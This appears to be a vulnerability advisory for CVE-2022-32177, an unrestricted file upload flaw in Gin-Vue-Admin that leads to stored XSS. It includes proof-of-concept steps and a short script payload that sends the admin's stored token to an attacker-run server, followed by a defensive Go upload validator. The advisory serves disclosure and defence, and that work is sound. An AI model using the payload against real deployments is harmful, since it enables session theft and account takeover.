CVE-2022-32177
Date: October 14, 2022
Overview
In "Gin-Vue-Admin", versions v2.5.1 through v2.5.3beta are vulnerable to Unrestricted File Upload leading to execution of JavaScript code, through the 'Normal Upload' functionality of the Media Library. When an admin user views the uploaded file, a low-privilege attacker gains access to the admin's cookie, leading to account takeover.
Details
The "Gin-Vue-Admin" application is affected by an "Unrestricted File Upload" vulnerability: a low-privilege user can upload an HTML file containing malicious JavaScript code to the Media Library, and when a victim views the file, the attacker gains access to the victim's cookie and account.
PoC Details
1. Access the application from a web browser and log in as an admin user.
2. Open a private window and log in as a regular (low-privilege) user.
3. Go to the personal information, click on the profile image, and then click on the 'Normal Upload' button.
4. Create a .png file with the code in the PoC code section below.
5. Start an HTTP server using Python (python3 -m http.server 3333).
6. Select takeover.png and intercept the upload request.
7. Change the name of takeover.png to takeover.html and forward the request.
8. Go to the Media Library (Upload and Download) from the admin account and open the takeover.html ('Open image in New Tab'). This will trigger the XSS payload from takeover.html and send the admin cookie to the attacker’s server, leading to account takeover.
PoC Code
takeover.png file:
<script>
var i=new Image;
i.src="http://127.0.0.1:3333/?"+localStorage.getItem('token');
</script>
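The PoC works because the server trusts the client-supplied filename (step 7 renames takeover.png to takeover.html) and then serves the stored file inline, so the browser renders it as HTML. The following is an added example, not Gin-Vue-Admin's code or a patch for it: a standard-library Go upload validator and download helper that closes both halves of that gap. The image allow-list, the 5 MiB size limit, the route names and the sample inputs in main are assumptions constructed for the example.

```go
package main

import (
	"errors"
	"fmt"
	"io"
	"mime"
	"net/http"
	"path"
	"strings"
)

// Upload size limit assumed for this example.
const maxUploadBytes = 5 << 20

// Allow-listed extensions and the content type each must sniff as.
var allowedTypes = map[string]string{
	".png":  "image/png",
	".jpg":  "image/jpeg",
	".jpeg": "image/jpeg",
	".gif":  "image/gif",
}

var (
	errRejected = errors.New("upload rejected: extension or content is not an allow-listed image")
	errTooLarge = errors.New("upload rejected: file exceeds size limit")
)

// validateUpload takes the client-supplied filename and body and returns the
// sanitized name plus the bytes to store. Extension and sniffed content type
// must both match the allow-list: renaming takeover.png to takeover.html (PoC
// step 7) fails on the extension, and HTML bytes under a .png name fail on
// the sniff, because http.DetectContentType reports "<script>" as text/html.
func validateUpload(filename string, body io.Reader) (string, []byte, error) {
	// Treat backslashes as separators too, then drop any directory part.
	name := path.Base(strings.ReplaceAll(filename, `\`, "/"))
	want, ok := allowedTypes[strings.ToLower(path.Ext(name))]
	if !ok {
		return "", nil, errRejected
	}
	data, err := io.ReadAll(io.LimitReader(body, maxUploadBytes+1))
	if err != nil {
		return "", nil, err
	}
	if len(data) > maxUploadBytes {
		return "", nil, errTooLarge
	}
	if got := http.DetectContentType(data); got != want {
		return "", nil, errRejected
	}
	return name, data, nil
}

// downloadHeaders builds the headers for every media response. The type comes
// from the allow-list, never from a sniff or the client; nosniff stops the
// browser from second-guessing it; attachment prevents inline rendering, so
// "Open image in New Tab" becomes a download; the CSP sandbox is a last line
// of defence should a viewer still render the bytes.
func downloadHeaders(name string) map[string]string {
	ctype, ok := allowedTypes[strings.ToLower(path.Ext(name))]
	if !ok {
		ctype = "application/octet-stream"
	}
	disp := mime.FormatMediaType("attachment", map[string]string{"filename": name})
	if disp == "" {
		disp = "attachment"
	}
	return map[string]string{
		"Content-Type":            ctype,
		"X-Content-Type-Options":  "nosniff",
		"Content-Disposition":     disp,
		"Content-Security-Policy": "default-src 'none'; sandbox",
	}
}

// serveMedia writes one stored file with the headers above; a Media Library
// download route would call it with the bytes validateUpload accepted.
func serveMedia(w http.ResponseWriter, name string, data []byte) {
	for k, v := range downloadHeaders(name) {
		w.Header().Set(k, v)
	}
	w.Write(data)
}

func main() {
	// Constructed inputs: a stand-in for the PoC script under its renamed and
	// original names, and a minimal PNG header with a directory prefix.
	payload := []byte("<script>/* constructed stand-in for the PoC script */</script>")
	png := append([]byte("\x89PNG\r\n\x1a\n"), make([]byte, 32)...)
	for _, in := range []struct {
		name string
		data []byte
	}{{"takeover.html", payload}, {"takeover.png", payload}, {`..\avatars\logo.PNG`, png}} {
		name, _, err := validateUpload(in.name, strings.NewReader(string(in.data)))
		fmt.Printf("%-22q -> name=%q err=%v\n", in.name, name, err)
	}
}
```

The two checks are deliberately independent: validation stops the renamed file from entering the library at all, and the download headers mean that even a file already in storage is never rendered as a page when an admin opens it. Only the first three steps of the PoC reach the server, so the extension check alone would break the chain; the sniff catches the other common variant, an HTML body behind a genuine image extension.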
Affected Environments
Gin-Vue-Admin versions v2.5.1 through v2.5.3beta
Prevention
No Fix
Language: Go
Good to know:
Upgrade Version
No fix version available
| Base Score: | |
|---|---|
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | Low |
| User Interaction (UI): | Required |
| Scope (S): | Changed |
| Confidentiality (C): | High |
| Integrity (I): | High |
| Availability (A): | High |